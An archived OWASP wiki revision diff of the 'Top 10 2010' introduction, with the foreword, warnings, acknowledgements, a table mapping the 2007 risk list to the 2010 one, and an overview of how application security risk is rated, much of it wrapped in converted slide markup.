This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org

Difference between revisions of "Top 10 2010"

From OWASP
Jump to: navigation, search
(Created page with '<div id="page1" class="dp3"><div id="Picture_2" class="P8" style="height: 25.399cm; width: 19.049cm"> [[Image:./]] </div><div id="Notes_Placeholder_2" class="P5" style="height:…')
 
m (Moved note to TopTemplate -> it is displayed on each page)
 
(28 intermediate revisions by 5 users not shown)
Line 1: Line 1:
<div id="page1" class="dp3"><div id="Picture_2" class="P8" style="height: 25.399cm; width: 19.049cm">
+
{{Top_10_2010:TopTemplate|usenext=2010NextLink|next=Release Notes|useprev=Nothing|prev=}}
 +
<!--- Moved note to TopTemplate -> it is displayed on each page --->
 +
{{Top_10_2010:SubsectionColoredTemplate|Foreword|
 +
Insecure software is already undermining our financial, healthcare, defense, energy, and other critical infrastructure. As our digital infrastructure gets increasingly complex and interconnected, the difficulty of achieving application security increases exponentially. We can no longer afford to tolerate relatively simple security problems like those presented in the OWASP Top 10.
  
[[Image:./]]
+
The goal of the Top 10 project is to raise awareness about application security by identifying some of the most critical risks facing organizations. The Top 10 project is referenced by many standards, books, tools, and organizations, including MITRE, PCI DSS, DISA, FTC, and [[Industry:Citations | many more]]. This release of the OWASP Top 10 marks this project’s eighth year of raising awareness of the importance of application security risks. The OWASP Top 10 was first released in 2003, minor updates were made in 2004 and 2007, and this is the 2010 release.
  
</div><div id="Notes_Placeholder_2" class="P5" style="height: 0.001cm; width: 0.001cm"><div>
+
We encourage you to use the Top 10 to get your organization started with application security. Developers can learn from the mistakes of other organizations. Executives should start thinking about how to manage the risk that software applications create in their enterprise.  
  
</div></div><div id="Slide_Number_Placeholder_3" class="P4" style="height: 0.001cm; width: 0.001cm"><div>
+
But the Top 10 is not an application security program. Going forward, OWASP recommends that organizations establish a strong foundation of training, standards, and tools that makes secure coding possible. On top of that foundation, organizations should integrate security into their development, verification, and maintenance processes. Management can use the data generated by these activities to manage cost and risk associated with application security.
  
<span class="T4"><span title="page-number"><number></span></span><span class="T4"><span title="page-number"><number></span></span>
+
We hope that the OWASP Top 10 is useful to your application security efforts. Please don’t hesitate to contact OWASP with your questions, comments, and ideas, either publicly to [mailto:OWASP-[email protected] OWASP-[email protected]] or privately to [mailto:[email protected] [email protected]].}}
 +
{{Top_10_2010:SubsectionColoredTemplate|Welcome|
 +
Welcome to the OWASP Top 10 2010!  This significant update presents a more concise, risk focused list of the '''Top 10 Most Critical Web Application Security Risks'''. The OWASP Top 10 has always been about risk, but this update makes this much more clear than previous editions. It also provides additional information on how to assess these risks for your applications.
  
</div></div></div><div id="page2" class="dp3"><div id="Title_1" class="P5" style="height: 2.116cm; width: 15.239cm"><div>
+
For each item in the top 10, this release discusses the general likelihood and consequence factors that are used to categorize the typical severity of the risk. It then presents guidance on how to verify whether you have problems in this area, how to avoid them, some example flaws, and pointers to links with more information.
  
<span class="T5">About OWASP</span>
+
The primary aim of the OWASP Top 10 is to educate developers, designers, architects, managers, and organizations about the consequences of the most important web application security weaknesses. The Top 10 provides basic techniques to protect against these high risk problem areas – and also provides guidance on where to go from here.}}
 +
{{Top_10_2010:SubsectionColoredTemplate|Warnings|}}
 +
'''Don’t stop at 10'''. There are hundreds of issues that could affect the overall security of a web application as discussed in the [[Guide | OWASP Developer's Guide]]. This is essential reading for anyone developing web applications today. Guidance on how to effectively find vulnerabilities in web applications are provided in the [[:Category:OWASP_Testing_Project | OWASP Testing Guide]] and the [[:Category:OWASP_Code_Review_Project | OWASP Code Review Guide]], which have both been significantly updated since the previous release of the OWASP Top 10.
  
</div></div><div id="Text_Placeholder_2" class="P5" style="height: 2.307cm; width: 3.597cm"><div>
+
'''Constant change'''. This Top 10 will continue to change. Even without changing a single line of your application’s code, you may already be vulnerable to something nobody ever thought of before. Please review the advice at the end of the Top 10 in “What’s Next For Developers, Verifiers, and Organizations” for more information.
  
* <span style="display: block; float: left; min-width: 0.952cm">•</span><span class="T6">O</span><span class="odfLiEnd"> </span>
+
'''Think positive'''. When you’re ready to stop chasing vulnerabilities and focus on establishing strong application security controls, OWASP has just produced the [[ASVS | Application Security Verification Standard (ASVS)]] as a guide to organizations and application reviewers on what to verify.
 +
Use tools wisely. Security vulnerabilities can be quite complex and buried in mountains of code. In virtually all cases, the most cost-effective approach for finding and eliminating these weaknesses is human experts armed with good tools.
  
</div></div><div id="Table_7" style="height: 3.173cm; width: 19.049cm">
+
'''Push left'''. Secure web applications are only possible when a secure software development life-cycle is used. For guidance on how to implement a secure SDLC, we recently released the [[:Category:Software_Assurance_Maturity_Model | Open Software Assurance Maturity Model (SAMM)]], which is a major update to the [[:Category:OWASP_CLASP_Project | OWASP CLASP Project]].
 
 
{|
 
|- class="ro1"
 
| class="ce1" style="text-align: left; width: 19.05cm" |
 
<span class="T7">Copyright and License</span>
 
|- class="ro2"
 
| class="ce2" style="text-align: left; width: 19.05cm" |
 
<span class="T8">Copyright © 2003 – 2010 The OWASP Foundation</span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T8">This document is released under the Creative Commons Attribution ShareAlike 3.0 license. For any reuse or distribution, you must make clear to others the license terms of this work.</span>
 
|}
 
 
 
[[Image:./]]
 
 
 
</div><div id="Picture_2" class="P8" style="height: 1.04cm; width: 2.905cm">
 
 
 
[[Image:./]]
 
 
 
</div><div id="Table_9" style="height: 20.762cm; width: 9.312cm">
 
 
 
{|
 
|- class="ro3"
 
| class="ce3" style="text-align: left; width: 9.313cm" |
 
<span class="T9">Foreword</span>
 
|- class="ro4"
 
| class="ce4" style="text-align: left; width: 9.313cm" |
 
<span class="T8">Insecure software is already undermining our financial, healthcare, defense, energy, and other critical infrastructure. As our digital infrastructure gets increasingly complex and interconnected, the difficulty of achieving application security increases exponentially. We can no longer afford to tolerate relatively simple security problems like those presented in the OWASP Top 10.</span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T8">The goal of the Top 10 project is to raise </span><span class="T10">awareness</span><span class="T8"> about application security by identifying some of the most critical risks facing organizations. The Top 10 project is referenced by many standards, books, tools, and organizations, including MITRE, PCI DSS, DISA, FTC, and </span><span class="T8">[http://www.owasp.org/index.php/Industry:Citations many more]</span><span class="T8">. This release of the OWASP Top 10 marks this project’s eighth year of raising awareness of the importance of application security risks. The OWASP Top 10 was first released in 2003, minor updates were made in 2004 and 2007, and this is the 2010 release.</span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T8">We encourage you to use the Top 10 to get your organization </span><span class="T11">started</span><span class="T8"> with application security. Developers can learn from the mistakes of other organizations. Executives should start thinking about how to manage the risk that software applications create in their enterprise. </span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T8">But the Top 10 is </span><span class="T11">not</span><span class="T8"> an application security program. Going forward, OWASP recommends that organizations establish a strong foundation of training, standards, and tools that makes secure coding possible. On top of that foundation, organizations should integrate security into their development, verification, and maintenance processes. Management can use the data generated by these activities to manage cost and risk associated with application security.</span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T8">We hope that the OWASP Top 10 is useful to your application security efforts. Please don’t hesitate to contact OWASP with your questions, comments, and ideas, either publicly to  </span><span class="T8">[mailto:[email protected] [email protected]]</span><span class="T8"> or privately to [email protected]. </span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T8">http://www.owasp.org/index.php/Top_10</span>
 
|}
 
 
 
[[Image:./]]
 
 
 
</div><div id="Table_10" style="height: 18.81cm; width: 9.524cm">
 
 
 
{|
 
|- class="ro5"
 
| class="ce5" style="text-align: left; width: 9.525cm" |
 
<span class="T9">About OWASP</span>
 
|- class="ro6"
 
| class="ce6" style="text-align: left; width: 9.525cm" |
 
<span class="T8">The Open Web Application Security Project (OWASP) is an open community dedicated to enabling organizations to develop, purchase, and maintain applications that can be trusted.  At OWASP you’ll find </span><span class="T10">free and open </span><span class="T8">…</span>
 
 
 
<span class="T8"></span>
 
 
 
* <span style="display: block; float: left; min-width: 0.317cm">•</span><span class="T8">Application security tools and standards</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0.317cm">•</span><span class="T8">Complete books on application security testing, secure code development, and security code review</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0.317cm">•</span><span class="T8">Standard security controls and libraries</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0.317cm">•</span><span class="T8">Local chapters worldwide</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0.317cm">•</span><span class="T8">Cutting edge research</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0.317cm">•</span><span class="T8">Extensive conferences worldwide</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0.317cm">•</span><span class="T8">Mailing lists</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0.317cm">•</span><span class="T8">And more … all at </span><span class="T8">[http://www.owasp.org/ www.owasp.org]</span><span class="T8"> </span><span class="odfLiEnd"> </span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T8">All of the OWASP tools, documents, forums, and chapters are free and open to anyone interested in improving application security. We advocate approaching application security as a people, process, and technology problem, because the most effective approaches to application security require improvements in all of these areas.</span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T8">OWASP is a new kind of organization. Our freedom from commercial pressures allows us to provide unbiased, practical, cost-effective information about application security. OWASP is not affiliated with any technology company, although we support the informed use of commercial security technology. Similar to many open-source software projects, OWASP produces many types of materials in a collaborative, open way.</span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T8">The OWASP Foundation is the non-profit entity that ensures the project’s long-term success. Almost everyone associated with OWASP is a volunteer, including the OWASP Board, Global Committees, Chapter Leaders, Project Leaders, and project members. We support innovative security research with grants and infrastructure.</span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T8">Come join us!</span>
 
|}
 
 
 
[[Image:./]]
 
 
 
</div><div id="Notes_Placeholder_2" class="P5" style="height: 0.001cm; width: 0.001cm"><div>
 
 
 
</div></div><div id="Slide_Number_Placeholder_3" class="P4" style="height: 0.001cm; width: 0.001cm"><div>
 
 
 
<span class="T4"><span title="page-number">2</span></span><span class="T4"><span title="page-number">2</span></span>
 
 
 
</div></div></div><div id="page3" class="dp3"><div id="Table_5" style="height: 7.098cm; width: 19.049cm">
 
 
 
{|
 
|- class="ro3"
 
| class="ce7" style="text-align: left; width: 19.05cm" |
 
<span class="T9">Welcome</span>
 
|- class="ro7"
 
| class="ce8" style="text-align: left; width: 19.05cm" |
 
<span class="T8">Welcome to the OWASP Top 10 2010!  This significant update presents a more concise, risk focused list of the </span><span class="T10">Top 10 Most Critical Web Application Security Risks</span><span class="T8">. The OWASP Top 10 has always been about risk, but this update makes this much more clear than previous editions. It also provides additional information on how to assess these risks for your applications.</span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T8">For each item in the top 10, this release discusses the general likelihood and consequence factors that are used to categorize the typical severity of the risk. It then presents guidance on how to verify whether you have problems in this area, how to avoid them, some example flaws, and pointers to links with more information.</span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T8">The primary aim of the OWASP Top 10 is to educate developers, designers, architects, managers, and organizations about the consequences of the most important web application security weaknesses. The Top 10 provides basic techniques to protect against these high risk problem areas – and also provides guidance on where to go from here. </span>
 
|}
 
 
 
[[Image:./]]
 
 
 
</div><div id="Table_6" style="height: 16.884cm; width: 9.312cm">
 
 
 
{|
 
|- class="ro3"
 
| class="ce9" style="text-align: left; width: 9.313cm" |
 
<span class="T7">Warnings</span>
 
|- class="ro8"
 
| class="ce10" style="text-align: left; width: 9.313cm" |
 
<span class="T12">Don’t stop at 10</span><span class="T8">. There are hundreds of issues that could affect the overall security of a web application as discussed in the </span><span class="T8">[http://www.owasp.org/index.php/Guide OWASP Developer’s ]</span><span class="T8">[http://www.owasp.org/index.php/Guide Guide]</span><span class="T8">. This is essential reading for anyone developing web applications today. Guidance on how to effectively find vulnerabilities in web applications are provided in the </span><span class="T8">[http://www.owasp.org/index.php/Category:OWASP_Testing_Project OWASP Testing Guide]</span><span class="T8"> and </span><span class="T8">[http://www.owasp.org/index.php/Category:OWASP_Code_Review_Project OWASP Code Review ]</span><span class="T8">[http://www.owasp.org/index.php/Category:OWASP_Code_Review_Project Guide]</span><span class="T8">, which have both been significantly updated since the previous release of the OWASP Top 10.</span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T12">Constant change</span><span class="T8">. This Top 10 will continue to change. Even without changing a single line of your application’s code, you may already be vulnerable to something nobody ever thought of before. Please review the advice at the end of the Top 10 in “</span><span class="T13">What’s Next For Developers, Verifiers, and Organizations</span><span class="T8">” for more information.</span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T12">Think positive</span><span class="T14">. </span><span class="T8">When you’re ready to stop chasing vulnerabilities and focus on establishing strong application security controls, OWASP has just produced the </span><span class="T8">[http://www.owasp.org/index.php/ASVS Application Security Verification Standard (ASVS)]</span><span class="T8"> as a guide to organizations and application reviewers on what to verify.</span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T12">Use tools wisely</span><span class="T8">. Security vulnerabilities can be quite complex and buried in mountains of code. In virtually all cases, the most cost-effective approach for finding and eliminating these weaknesses is human experts armed with good tools.</span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T12">Push left</span><span class="T8">. Secure web applications are only possible when a secure software development lifecycle is used. For guidance on how to implement a secure SDLC, we recently released the </span><span class="T8">[http://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Open ]</span><span class="T8">[http://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model (SAMM)]</span><span class="T8">, which is a major update to the </span><span class="T8">[http://www.owasp.org/index.php/Category:OWASP_CLASP_Project OWASP CLASP Project]</span><span class="T8">.</span>
 
|}
 
 
 
[[Image:./]]
 
 
 
</div><div id="Table_7" style="height: 15.485cm; width: 9.524cm">
 
 
 
{|
 
|- class="ro3"
 
| class="ce11" style="text-align: left; width: 9.525cm" |
 
<span class="T7">Acknowledgements</span>
 
|- class="ro9"
 
| class="ce12" style="text-align: left; width: 9.525cm" |
 
<span class="T8">Thanks to </span><span class="T8">[http://www.aspectsecurity.com/ Aspect Security]</span><span class="T8"> for initiating, leading, and updating the OWASP Top 10 since its inception in 2003, and to its primary authors: Jeff Williams and Dave Wichers.</span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T8">We’d like to thank those organizations that contributed their vulnerability prevalence data to support the 2010 update:</span><span class="T8"><br /></span><span class="T8"></span>
 
 
 
# #* <span style="display: block; float: left; min-width: 0.325cm">§</span><span class="T8">[http://www.aspectsecurity.com/ Aspect Security]</span><span class="T8"> </span><span class="odfLiEnd"> </span>
 
#* <span style="display: block; float: left; min-width: 0.325cm">§</span><span class="T8">[http://www.mitre.org/ MITRE]</span><span class="T8"> – </span><span class="T8">[http://cve.mitre.org/ CVE]</span><span class="odfLiEnd"> </span>
 
#* <span style="display: block; float: left; min-width: 0.325cm">§</span><span class="T8">[http://www.softtek.com/ Softtek]</span><span class="odfLiEnd"> </span>
 
#* <span style="display: block; float: left; min-width: 0.325cm">§</span><span class="T8">[http://www.whitehatsec.com/ White Hat Security]</span><span class="T8"> – </span><span class="T8">[http://www.whitehatsec.com/home/resource/stats.html Statistics]</span><span class="odfLiEnd"> </span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T8">We’d also like to thank those who have contributed significant content or time reviewing this update of the Top 10:</span>
 
 
 
<span class="T8"></span>
 
 
 
# #* <span style="display: block; float: left; min-width: 0.325cm">§</span><span class="T8">Mike Boberski (Booz Allen Hamilton)</span><span class="odfLiEnd"> </span>
 
#* <span style="display: block; float: left; min-width: 0.325cm">§</span><span class="T8">Juan Carlos Calderon (Softtek)</span><span class="odfLiEnd"> </span>
 
#* <span style="display: block; float: left; min-width: 0.325cm">§</span><span class="T8">Michael Coates (Aspect Security)</span><span class="odfLiEnd"> </span>
 
#* <span style="display: block; float: left; min-width: 0.325cm">§</span><span class="T8">Jeremiah Grossman (White Hat Security)</span><span class="odfLiEnd"> </span>
 
#* <span style="display: block; float: left; min-width: 0.325cm">§</span><span class="T8">Paul Petefish (Solutionary, Inc.)</span><span class="odfLiEnd"> </span>
 
#* <span style="display: block; float: left; min-width: 0.325cm">§</span><span class="T8">Eric Sheridan (Aspect Security)</span><span class="odfLiEnd"> </span>
 
#* <span style="display: block; float: left; min-width: 0.325cm">§</span><span class="T8">Andrew van der Stock</span><span class="odfLiEnd"> </span>
 
#* <span style="display: block; float: left; min-width: 0.325cm">§</span><span class="T8">Colin Watson (Watson Hall, Ltd.)</span><span class="odfLiEnd"> </span>
 
#* <span style="display: block; float: left; min-width: 0.325cm">§</span><span class="T8">OWASP Denmark Chapter (Led by Ulf Munkedal)</span><span class="odfLiEnd"> </span>
 
#* <span style="display: block; float: left; min-width: 0.325cm">§</span><span class="T8">OWASP Sweden Chapter (Led by John Wilander)</span><span class="odfLiEnd"> </span>
 
|}
 
 
 
[[Image:./]]
 
 
 
</div><div id="Picture_3" class="P8" style="height: 1.269cm; width: 5.079cm">
 
 
 
[[Image:./]]
 
 
 
</div><div id="Text_Placeholder_10" class="P5" style="height: 2.307cm; width: 3.597cm"><div>
 
 
 
* <span style="display: block; float: left; min-width: 0.952cm">•</span><span class="T6">I</span><span class="odfLiEnd"> </span>
 
 
 
</div></div><div id="Title_8" class="P5" style="height: 2.116cm; width: 15.239cm"><div>
 
 
 
<span class="T5">Introduction</span>
 
 
 
</div></div><div id="Notes_Placeholder_2" class="P5" style="height: 0.001cm; width: 0.001cm"><div>
 
 
 
</div></div><div id="Slide_Number_Placeholder_3" class="P4" style="height: 0.001cm; width: 0.001cm"><div>
 
 
 
<span class="T4"><span title="page-number">3</span></span><span class="T4"><span title="page-number">3</span></span>
 
 
 
</div></div></div><div id="page4" class="dp3"><div id="Table_6" style="height: 12.532cm; width: 19.049cm">
 
 
 
{|
 
|- class="ro3"
 
| class="ce13" style="text-align: left; width: 19.05cm" |
 
<span class="T7">What changed from 2007 to 2010?</span>
 
|- class="ro10"
 
| class="ce14" style="text-align: left; width: 19.05cm" |
 
<span class="T8">The threat landscape for Internet applications constantly changes. Key factors in this evolution are advances made by attackers, the release of new technology, as well as the deployment of increasingly complex systems. To keep pace, we periodically update the OWASP Top 10. In this 2010 release, we have made three significant changes:</span>
 
 
 
<span class="T8"></span>
 
 
 
# <span style="display: block; float: left; min-width: 0.634cm">●)</span><span class="T8">We clarified that the Top 10 is about the </span><span class="T10">Top 10 Risks</span><span class="T8">, not the Top 10 most common weaknesses. See the details on the “</span><span class="T13">Application Security Risks</span><span class="T8">” page below.</span><span class="odfLiEnd"> </span>
 
 
 
<span class="T8"></span>
 
 
 
# <span style="display: block; float: left; min-width: 0.634cm">●)</span><span class="T8">We changed our ranking methodology to estimate risk, instead of relying solely on the frequency of the associated weakness. This has affected the ordering of the Top 10, as you can see in the table below.</span><span class="odfLiEnd"> </span>
 
 
 
<span class="T8"></span>
 
 
 
# <span style="display: block; float: left; min-width: 0.634cm">●)</span><span class="T8">We replaced two items on the list with two new items:</span><span class="odfLiEnd"> </span>
 
 
 
<span class="T8"></span>
 
 
 
# #* <span style="display: block; float: left; min-width: 0.634cm">+</span><span class="T8">ADDED: A6 – Security Misconfiguration. This issue was A10 in the Top 10 from 2004: Insecure Configuration Management, but was dropped in 2007 because it wasn’t considered to be a software issue. However, from an organizational risk and prevalence perspective, it clearly merits re-inclusion in the Top 10; so now it’s back.</span><span class="odfLiEnd"> </span>
 
#* <span style="display: block; float: left; min-width: 0.634cm">+</span><span class="T8">ADDED: A10 – Unvalidated Redirects and Forwards. This issue is making its debut in the Top 10. The evidence shows that this relatively unknown issue is widespread and can cause significant damage.</span><span class="odfLiEnd"> </span>
 
 
 
# #* <span style="display: block; float: left; min-width: 0.634cm">–</span><span class="T8">REMOVED: A3 – Malicious File Execution. This is still a significant problem in many different environments. However, its prevalence in 2007 was inflated by large numbers of PHP applications having this problem. PHP now ships with a more secure configuration by default, lowering the prevalence of this problem.</span><span class="odfLiEnd"> </span>
 
#* <span style="display: block; float: left; min-width: 0.634cm">–</span><span class="T8">REMOVED: A6 – Information Leakage and Improper Error Handling. This issue is extremely prevalent, but the impact of disclosing stack trace and error message information is typically minimal. With the addition of Security Misconfiguration this year, proper configuration of error handling is a big part of securely configuring your application and servers.</span><span class="odfLiEnd"> </span>
 
|}
 
 
 
[[Image:./]]
 
 
 
</div><div id="Table_72" style="height: 11.335cm; width: 19.049cm">
 
 
 
{|
 
|- class="ro11"
 
| class="ce15" style="text-align: left; width: 9.525cm" |
 
<span class="T9">OWASP Top 10 – 2007 (Previous)</span>
 
| class="ce16" style="text-align: left; width: 9.525cm" |
 
<span class="T9">OWASP Top 10 – 2010 (New)</span>
 
|- class="ro12"
 
| class="ce17" style="text-align: left; width: 9.525cm" |
 
<span class="T12">A2 – Injection Flaws</span>
 
| class="ce18" style="text-align: left; width: 9.525cm" |
 
<span class="T12">A1 – Injection</span>
 
|- class="ro12"
 
| class="ce19" style="text-align: left; width: 9.525cm" |
 
<span class="T12">A1 – Cross Site Scripting (XSS)</span>
 
| class="ce20" style="text-align: left; width: 9.525cm" |
 
<span class="T12">A2 – Cross-Site Scripting (XSS)</span>
 
|- class="ro13"
 
| class="ce21" style="text-align: left; width: 9.525cm" |
 
<span class="T12">A7 – Broken Authentication and Session Management</span>
 
| class="ce22" style="text-align: left; width: 9.525cm" |
 
<span class="T12">A3 – Broken Authentication and Session Management</span>
 
|- class="ro12"
 
| class="ce23" style="text-align: left; width: 9.525cm" |
 
<span class="T12">A4 – Insecure Direct Object Reference</span>
 
| class="ce24" style="text-align: left; width: 9.525cm" |
 
<span class="T12">A4 – Insecure Direct Object References</span>
 
|- class="ro12"
 
| class="ce25" style="text-align: left; width: 9.525cm" |
 
<span class="T12">A5 – Cross Site Request Forgery (CSRF)</span>
 
| class="ce26" style="text-align: left; width: 9.525cm" |
 
<span class="T12">A5 – Cross-Site Request Forgery (CSRF)</span>
 
|- class="ro13"
 
| class="ce27" style="text-align: left; width: 9.525cm" |
 
<span class="T12"><was T10 2004 A10 – Insecure Configuration Management></span>
 
| class="ce28" style="text-align: left; width: 9.525cm" |
 
<span class="T12">A6 – Security Misconfiguration (NEW)</span>
 
|- class="ro12"
 
| class="ce29" style="text-align: left; width: 9.525cm" |
 
<span class="T12">A8 – Insecure Cryptographic Storage</span>
 
| class="ce30" style="text-align: left; width: 9.525cm" |
 
<span class="T12">A7 – Insecure Cryptographic Storage</span>
 
|- class="ro12"
 
| class="ce31" style="text-align: left; width: 9.525cm" |
 
<span class="T12">A10 – Failure to Restrict URL Access</span>
 
| class="ce32" style="text-align: left; width: 9.525cm" |
 
<span class="T12">A8 – Failure to Restrict URL Access</span>
 
|- class="ro12"
 
| class="ce33" style="text-align: left; width: 9.525cm" |
 
<span class="T12">A9 – Insecure Communications</span>
 
| class="ce34" style="text-align: left; width: 9.525cm" |
 
<span class="T12">A9 – Insufficient Transport Layer Protection</span>
 
|- class="ro12"
 
| class="ce35" style="text-align: left; width: 9.525cm" |
 
<span class="T12"><not in T10 2007></span>
 
| class="ce36" style="text-align: left; width: 9.525cm" |
 
<span class="T12">A10 – Unvalidated Redirects and Forwards (NEW)</span>
 
|- class="ro12"
 
| class="ce37" style="text-align: left; width: 9.525cm" |
 
<span class="T12">A3 – Malicious File Execution</span>
 
| class="ce38" style="text-align: left; width: 9.525cm" |
 
<span class="T12"><dropped from T10 2010></span>
 
|- class="ro13"
 
| class="ce39" style="text-align: left; width: 9.525cm" |
 
<span class="T12">A6 – Information Leakage and Improper Error Handling</span>
 
| class="ce40" style="text-align: left; width: 9.525cm" |
 
<span class="T12"><dropped from T10 2010></span>
 
|}
 
 
 
[[Image:./]]
 
 
 
</div><div id="Title_7" class="P5" style="height: 2.116cm; width: 15.239cm"><div>
 
 
 
<span class="T5">Release Notes</span>
 
 
 
</div></div><div id="Text_Placeholder_8" class="P5" style="height: 2.307cm; width: 3.597cm"><div>
 
 
 
* <span style="display: block; float: left; min-width: 0.952cm">•</span><span class="T6">RN</span><span class="odfLiEnd"> </span>
 
 
 
</div></div><div id="Notes_Placeholder_2" class="P5" style="height: 0.001cm; width: 0.001cm"><div>
 
 
 
</div></div><div id="Slide_Number_Placeholder_3" class="P4" style="height: 0.001cm; width: 0.001cm"><div>
 
 
 
<span class="T4"><span title="page-number">4</span></span><span class="T4"><span title="page-number">4</span></span>
 
 
 
</div></div></div><div id="page5" class="dp3">
 
 
 
<span class="T15"><br /></span><span class="T15">What Are Application Security Risks?</span>
 
 
 
<span class="T8">Attackers can potentially use many different paths through your application to do harm to your business or organization. Each of these paths represents a risk that may, or may not, be serious enough to warrant attention.</span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T8">Sometimes, these paths are trivial to find and exploit and sometimes they are extremely difficult. Similarly, the harm that is caused may range from nothing, all the way through putting you out of business. To determine the risk to your organization, you can evaluate the likelihood associated with each threat agent, attack vector, and security weakness and combine it with an estimate of the technical and business impact to your organization.  Together, these factors determine the overall risk.</span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T16">Weakness</span>
 
 
 
<span class="T16">Attack</span>
 
 
 
<span class="T17">Threat</span><span class="T17"><br /></span><span class="T17">Agents</span>
 
 
 
<span class="T16">Impact</span>
 
 
 
<span class="T15"><br /></span><span class="T15">What’s </span><span class="T18">My</span><span class="T15"> Risk?</span>
 
 
 
<span class="T8">This update to the </span><span class="T8">[http://www.owasp.org/index.php/Top_10 OWASP Top 10]</span><span class="T8"> focuses on identifying the most serious risks for a broad array of organizations. For each of these risks, we provide generic information about likelihood and technical impact using the following simple ratings scheme, which is based on the </span><span class="T8">[http://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology OWASP Risk Rating Methodology]</span><span class="T8">.</span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T8"></span>
 
 
 
<span class="T8">However, only you know the specifics of your environment and your business. For any given application, there may not be a threat agent that can perform the relevant attack, or the technical impact may not make any difference. Therefore, you should evaluate each risk for yourself, focusing on the threat agents, security controls, and business impacts in your enterprise.</span>
 
 
 
<span class="T8">Although </span><span class="T8">[http://www.owasp.org/index.php/Top_10_2007 previous versions of the OWASP Top 10]</span><span class="T8"> focused on identifying the most common “vulnerabilities”, they were also designed around risk. The names of the risks in the Top 10 stem from the type of attack, the type of weakness, or the type of impact they cause. We chose the name that is best known and will achieve the highest level of awareness.</span>
 
 
 
<span class="T15"><br /></span><span class="T15">References</span>
 
 
 
<span class="T15"></span>
 
 
 
<span class="T19">OWASP</span>
 
 
 
* <span style="display: block; float: left; min-width: 0.158cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology OWASP Risk Rating Methodology]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0.158cm">•</span><span class="T8"> </span><span class="T11">[http://www.owasp.org/index.php/Threat_Risk_Modeling Article on Threat/Risk Modeling]</span><span class="odfLiEnd"> </span>
 
 
 
<span class="T11"></span>
 
 
 
<span class="T11"></span>
 
 
 
<span class="T19">External</span>
 
 
 
* <span style="display: block; float: left; min-width: 0.158cm">•</span><span class="T8"> </span><span class="T11">[http://fairwiki.riskmanagementinsight.com/ FAIR Information Risk Framework]</span><span class="T11"> </span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0.158cm">•</span><span class="T8"> </span><span class="T11">[http://msdn.microsoft.com/en-us/library/aa302419.aspx Microsoft Threat Modeling (STRIDE and DREAD)]</span><span class="odfLiEnd"> </span>
 
 
 
<span class="T16">    </span><span class="T16">Weakness</span>
 
 
 
<span class="T16">Attack</span>
 
 
 
<span class="T17">Attack</span>
 
 
 
<span class="T17">Vectors</span>
 
 
 
<span class="T17">Security</span><span class="T17"><br /></span><span class="T17">Weaknesses</span>
 
 
 
<span class="T17">Technical</span>
 
 
 
<span class="T17">Impacts</span>
 
 
 
<span class="T17">Business</span>
 
 
 
<span class="T17">Impacts</span>
 
 
 
<span class="T16">Attack</span>
 
 
 
<span class="T16">Impact</span>
 
 
 
<span class="T16">Impact</span>
 
 
 
<span class="T16">Asset</span>
 
 
 
<span class="T16">Function</span>
 
 
 
<span class="T16">Asset</span>
 
 
 
<span class="T16">Weakness</span>
 
 
 
<span class="T16">Control</span>
 
 
 
<span class="T16">Control</span>
 
 
 
<span class="T16">Control</span>
 
 
 
<span class="T16">Weakness</span>
 
 
 
<span class="T17">Security</span><span class="T17"><br /></span><span class="T17">Controls</span>
 
 
 
<div id="Table_122" style="height: 2.919cm; width: 11.428cm">
 
 
 
{|
 
|- class="ro14"
 
| class="ce41" style="text-align: left; width: 1.693cm" |
 
<span class="T20">Threat</span>
 
 
 
<span class="T20">Agent</span>
 
| class="ce42" style="text-align: left; width: 2.01cm" |
 
<span class="T20">Attack</span>
 
 
 
<span class="T20">Vector</span>
 
| class="ce43" style="text-align: left; width: 2.01cm" |
 
<span class="T20">Weakness Prevalence</span>
 
